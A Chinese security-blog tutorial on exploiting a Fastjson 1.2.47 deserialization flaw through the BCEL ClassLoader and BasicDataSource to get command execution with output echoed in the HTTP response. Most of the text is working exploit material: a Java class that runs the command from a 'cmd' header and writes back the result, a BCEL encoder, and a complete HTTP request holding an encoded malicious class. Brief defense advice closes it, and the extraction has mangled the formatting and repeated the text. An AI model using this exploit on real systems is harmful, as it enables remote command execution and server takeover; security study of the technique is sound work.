利用BCEL打fastjson直接burp回显getshell
字数 1117 2025-08-10 16:34:25

Fastjson BCEL 漏洞利用与回显Getshell技术分析

一、背景概述

Fastjson是Java中一个常用的JSON解析库,因其反序列化漏洞而广受关注。在内网环境中,传统的DNSLog探测方式往往失效,BCEL(Byte Code Engineering Library)链提供了一种直接通过Burp Suite回显实现Getshell的有效方法。

二、BCEL技术原理

1. BCEL基础概念

BCEL是Apache Commons项目的一部分,全称Byte Code Engineering Library,用于分析、创建和操作Java类文件。其核心功能包括:

  • 类文件解析与生成
  • 字节码操作
  • 动态类加载

2. BCEL类加载机制

BCEL提供了特殊的类加载方式,通过`

\[BCEL \]

`前缀标识BCEL编码的类:

new ClassLoader().loadClass("
$$
BCEL
$$
" + code).newInstance();

3. BCEL类加载流程

  1. 第一次尝试:在哈希表查找已加载的类对象
  2. 第二次尝试:使用系统类加载器加载系统类
  3. 第三次尝试:检查`

\[BCEL \]

标识,调用createClass`方法
4. 第四次尝试:通过仓库加载类

三、漏洞利用准备

1. 恶意类构造

准备一个简单的恶意类用于测试:

import java.io.IOException;

public class calc {
    static {
        try {
            Runtime.getRuntime().exec("open -a Calculator");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

2. BCEL编码工具

import com.sun.org.apache.bcel.internal.Repository;
import com.sun.org.apache.bcel.internal.classfile.JavaClass;
import com.sun.org.apache.bcel.internal.classfile.Utility;
import com.sun.org.apache.bcel.internal.util.ClassLoader;

public class BCELDemo {
    public static void main(String[] args) throws Exception {
        JavaClass cls = Repository.lookupClass(calc.class);
        String code = Utility.encode(cls.getBytes(), true);
        System.out.println(code);
        new ClassLoader().loadClass("
$$
BCEL
$$
" + code).newInstance();
    }
}

3. BCEL编码过程分析

  1. 使用Repository.lookupClass查找类
  2. 通过Utility.encode将字节码Base64编码
  3. 添加`

\[BCEL \]

`前缀后加载执行

四、Fastjson漏洞利用

1. 环境搭建

使用Fastjson 1.2.47版本搭建漏洞环境,访问127.0.0.1:9002/json

2. 核心组件

BCELEncode工具类

import com.sun.org.apache.bcel.internal.classfile.Utility;
import java.nio.file.*;

public class BCELEncode {
    public static String class2BCEL(String classFile) throws Exception {
        Path path = Paths.get(classFile);
        byte[] bytes = Files.readAllBytes(path);
        return Utility.encode(bytes, true);
    }
    
    public static void main(String[] args) throws Exception {
        System.out.println(class2BCEL("SpringEcho.class"));
    }
}

SpringEcho回显类

import java.lang.reflect.Method;
import java.util.Scanner;

public class SpringEcho {
    static {
        try {
            // 获取Request和Response对象
            Class c = Thread.currentThread().getContextClassLoader()
                .loadClass("org.springframework.web.context.request.RequestContextHolder");
            Method m = c.getMethod("getRequestAttributes");
            Object o = m.invoke(null);
            c = Thread.currentThread().getContextClassLoader()
                .loadClass("org.springframework.web.context.request.ServletRequestAttributes");
            m = c.getMethod("getResponse");
            Method m1 = c.getMethod("getRequest");
            Object resp = m.invoke(o);
            Object req = m1.invoke(o);
            
            // 获取Writer和Header
            Method getWriter = Thread.currentThread().getContextClassLoader()
                .loadClass("javax.servlet.ServletResponse").getDeclaredMethod("getWriter");
            Method getHeader = Thread.currentThread().getContextClassLoader()
                .loadClass("javax.servlet.http.HttpServletRequest").getDeclaredMethod("getHeader", String.class);
            getHeader.setAccessible(true);
            getWriter.setAccessible(true);
            Object writer = getWriter.invoke(resp);
            String cmd = (String)getHeader.invoke(req, "cmd");
            
            // 执行命令
            String[] commands = new String[3];
            if (System.getProperty("os.name").toUpperCase().contains("WIN")) {
                commands[0] = "cmd";
                commands[1] = "/c";
            } else {
                commands[0] = "/bin/sh";
                commands[1] = "-c";
            }
            commands[2] = cmd;
            
            // 回显结果
            writer.getClass().getDeclaredMethod("println", String.class)
                .invoke(writer, new Scanner(Runtime.getRuntime().exec(commands).getInputStream())
                .useDelimiter("\\A").next());
            writer.getClass().getDeclaredMethod("flush").invoke(writer);
            writer.getClass().getDeclaredMethod("close").invoke(writer);
        } catch (Exception e) {}
    }
}

3. 漏洞利用Payload

POST /json HTTP/1.1
Host: 127.0.0.1:9092
Content-Type: application/json
cmd: hostname
Content-Length: 3647

{
    "xx": {
        "@type": "java.lang.Class",
        "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"
    },
    "x": {
        "name": {
            "@type": "java.lang.Class",
            "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"
        },
        {
            "@type":"com.alibaba.fastjson.JSONObject",
            "c": {
                "@type":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
                "driverClassLoader": {
                    "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"
                },
                "driverClassName":"
$$
BCEL
$$
$l$8b$I$A$A$A$A$A$A$A$8dV$cb$5b$TW$U$ff$5dH27$c3$m$g$40$Z$d1$wX5$a0$q$7d$d8V$81Zi$c4b$F$b4F$a5$f8j$t$c3$85$MLf$e2$cc$E$b1$ef$f7$c3$be$ec$a6$df$d7u$X$ae$ddD$bf$f6$d3$af$eb
$$
$ba$ea$b6$ab$ae$ba$ea$7fP$7bnf$C$89$d0$afeq$ee$bd$e7$fe$ce$ebw$ce$9d$f0$cb$df$3f$3e$Ap$I$df$aaHbX$c5$IF$a5x$9e$e3$a8$8a$Xp$8ccL$c1$8b$w$U$e4$U$iW1$8e$T$i$_qLp$9c$e4x$99$e3$94$bc$9b$e4$98$e2$98VpZ$o$cep$bc$c2qVE$k$e7Tt$e2$3c$c7$F$b9$cep$bc$ca1$cbqQ$G$bb$c4qY$c1$V$VW$f1$9a$U$af$ab0PP$b1$h$s$c7$9c$5c$85$U$f3$i$L$iE$F$96$82E$86$c4$a8$e5X$c1Q$86$d6$f4$c0$F$86X$ce$9d$T$M$j$93$96$p$a6$x$a5$82$f0$ce$Z$F$9b4$7c$d4$b4$pd$7b$3e0$cc$a5$v$a3$5c$bb$a2j$U$yQ$z$94$ac$C$9b$fc2$a8y$b7$e2$99$e2$84$r$z$3b$f2e$cfr$W$c6$cd$a2$9bY4$96$N$N$H1$a4$a0$a4$c1$81$ab$a1$8ck$M$a3$ae$b7$90$f1k$b8y$cf$u$89$eb$ae$b7$94$b9
$$
$K$Z$d3u$C$b1$Sd$3cq$ad$o$fc$ms6$5cs$a1z$c2$b5$e7$84$a7$c0$d3$e0$p$60$e8Z$QA$84$Y$L$C$cf$wT$C$e1S$G2l$d66$9c$85l$ce6$7c_C$F$cb$M$9b$d7$d4$a7$L$8b$c2$M$a8$O$N$d7$b1$c2p$ec$ff$e6$93$X$de$b2$bda$d0$b6Z
$$
$7e$d9u$7c$oA$5d$cb$8ca$a7$M$bc$92$f1C$db5$lup$92$c03$9e$V$I$aa$eb$86$ccto$b3A1$I$ca$99$J$S$cd$d1C$c3$Ja$Q$tM$d5$e5$DY$88$867$f0$s$f5$d9$y$cd1$u$ae$9fq$a80$Foix$h$efhx$X$ef$d1$e5$cc$c9i$N$ef$e3$D$86$96$acI$b0l$c1r$b2$7e$91$8eC$a6$86$P$f1$R$e9$q$z$81$ed0l$a9$85$a8$E$96$9d$cd$9b$86$e3$c8V$7c$ac$e1$T$7c$aa$e13$7c$ae$e0$a6$86$_$f0$a5l$f8W$e4$e1$f2$98$86$af$f1$8d$86$5b2T$7c$de$aeH$c7q$d3ve$d1$9dk$f9$8e$af$98$a2$iX
$$
$85$e85$ddRv$de$f0$83E$dfu$b2$cb$V$8a$b4$3aM$M$3dk6$9e$98$b7$a9$85$d9$v$R$U$5d$w$b0$f3$d2$e4$a3$E$8c4$91r$ae$e8$RS4$cdf$c5$f3$84$T$d4$cf$5d$e9$81$c9GQd$d9M$d4FSW$9b$a1I7$a4Yo$827$5cI$9b$N$_$a8M6mj$gjmz$7d$9e$eb$3c$8e$84$ad$ad$d7vl$D$9bK$ebl$g$bd4$b3C$ee$S$96$b3$ec
$$
$R$edG$g$7d$85$cf$a0$c9W$a4$gX$af$a2$feSN$c7$85i$h$9e$98$ab$e7$d6$ee$8b$60$cc4$85$ef$5b$b5$efF$y$7dQ$7eW$g$a7$f1$86$l$88R$f8$40$cexnYx$c1$N$86$7d$ff$c1$c3j$L$db$C$f7$7c$99$8cr$86$9c$9a$e6n$ad$82$b8$7c$a7$86$e5$Q$c1$bd$8d$8esE$c3$cb$cb$d7$e2$98bd$e0$o$Be$5b$c3Nt$ae$ef$e4H$7d$c6k$aa$b3$V$t$b0J$f5$c7$5c$3ft7$99Ej2$8c$89$VA$_$u$9d$de$60$Q$h$z$88$C$c9Vs$a8H$c9$b0$89B$9dt$ca$95$80$y$85A$acm$ab$87$b3$dcl$c3$F$99$f7$a47$bc$90$eck$V_$i$X$b6U$92$df$U$86$fd$ff$ceu$e3c$96E84$ef$e8$c3$B$fa$7d$91$7f$z$60$f2$ebM2C$a7$9d$b42Z$e3$83w$c1$ee$d0$86$nK2QS$s$c0$f1D$j$da$d2O$O$da$Ip$f5$kZ$aahM$c5$aa$88$9f$gL$rZ$efC$a9$82O$k$60$b4KV$a1NE$80$b6$Q$a0$d5$B$83$a9$f6h$3b$7d$e0$60$84$j$8e$N$adn$e3$91$dd$s$b2Ku$84$d0$cd$c3$89H$bbEjS1$d2$ce$b6$a6$3a$f3$f2J$d1$VJ$a2KO$84R$8f$d5$3dq$5d$d1$e3$EM$S$b4$9b$a0$ea$cf$e8$iN$s$ee$93TS$5b$efa$5b$V$3d$v$bd$8a$ed$df$p$a5$ab$S$a3$ab$b1To$fe6$3a$e4qG$ed$b8$93d$5cO$e6u$5e$c5c$a9$5d$8d$91u$k$3a$ff$J$bbg$ef$a1OW$ab$e8$afb$cf$5d$3c$9e$da$5b$c5$be$w$f6$cb$a03$a1e$3a$aaD$e7Qz$91$7e$60$9d$fe6b$a7$eeH$e6$d9$y$bb$8cAj$95$ec$85$83$5e$92IhP$b1$8d$3a$d0G$bb$n$b4$e306$n$87$OLc3f$b1$F
$$
R$b8I$ffR$dcB$X$beC7$7e$c0VP$a9x$80$k$fc$K$j$bfa$3b$7e$c7$O$fcAM$ff$T$bb$f0$Xv$b3$B$f4$b11$f4$b3Y$ec$a5$88$7b$d8$V$ec$c7$93$U$edY$c4$k$S$b8M$c1S$K$9eVp$a8
$$
$c3M$b8$7fF$n$i$da$k$c2$93s$a3$e099$3d$87k$pv$e4$l$3eQL$40E$J$A$A"
            }
        } : "xxx"
    }
}

五、漏洞利用流程

  1. 反序列化触发:Fastjson解析恶意JSON时触发反序列化
  2. 类加载过程
    • 通过@type找到BasicDataSourceClassLoader
    • 加载BCEL编码的恶意类
  3. 恶意类执行
    • 解码BCEL字符串为原始字节码
    • 动态加载并实例化恶意类
  4. 命令执行回显
    • 通过HTTP头cmd获取命令
    • 执行系统命令并将结果写入Response

六、防御措施

  1. 升级Fastjson:使用最新无漏洞版本
  2. 禁用危险特性:关闭autotype功能
  3. 输入过滤:严格校验JSON输入
  4. 安全配置:限制可反序列化的类
  5. 依赖管理:移除或替换BCEL库

七、总结

BCEL链提供了一种有效的内网回显方法,通过Fastjson反序列化漏洞可直接实现命令执行和结果回显。理解其原理有助于更好地防御此类攻击,同时也可用于合法的安全测试场景。

Fastjson BCEL 漏洞利用与回显Getshell技术分析 一、背景概述 Fastjson是Java中一个常用的JSON解析库,因其反序列化漏洞而广受关注。在内网环境中,传统的DNSLog探测方式往往失效,BCEL(Byte Code Engineering Library)链提供了一种直接通过Burp Suite回显实现Getshell的有效方法。 二、BCEL技术原理 1. BCEL基础概念 BCEL是Apache Commons项目的一部分,全称Byte Code Engineering Library,用于分析、创建和操作Java类文件。其核心功能包括: 类文件解析与生成 字节码操作 动态类加载 2. BCEL类加载机制 BCEL提供了特殊的类加载方式,通过 $$BCEL$$ 前缀标识BCEL编码的类: 3. BCEL类加载流程 第一次尝试 :在哈希表查找已加载的类对象 第二次尝试 :使用系统类加载器加载系统类 第三次尝试 :检查 $$BCEL$$ 标识,调用 createClass 方法 第四次尝试 :通过仓库加载类 三、漏洞利用准备 1. 恶意类构造 准备一个简单的恶意类用于测试: 2. BCEL编码工具 3. BCEL编码过程分析 使用 Repository.lookupClass 查找类 通过 Utility.encode 将字节码Base64编码 添加 $$BCEL$$ 前缀后加载执行 四、Fastjson漏洞利用 1. 环境搭建 使用Fastjson 1.2.47版本搭建漏洞环境,访问 127.0.0.1:9002/json 2. 核心组件 BCELEncode工具类 SpringEcho回显类 3. 漏洞利用Payload 五、漏洞利用流程 反序列化触发 :Fastjson解析恶意JSON时触发反序列化 类加载过程 : 通过 @type 找到 BasicDataSource 和 ClassLoader 加载BCEL编码的恶意类 恶意类执行 : 解码BCEL字符串为原始字节码 动态加载并实例化恶意类 命令执行回显 : 通过HTTP头 cmd 获取命令 执行系统命令并将结果写入Response 六、防御措施 升级Fastjson :使用最新无漏洞版本 禁用危险特性 :关闭autotype功能 输入过滤 :严格校验JSON输入 安全配置 :限制可反序列化的类 依赖管理 :移除或替换BCEL库 七、总结 BCEL链提供了一种有效的内网回显方法,通过Fastjson反序列化漏洞可直接实现命令执行和结果回显。理解其原理有助于更好地防御此类攻击,同时也可用于合法的安全测试场景。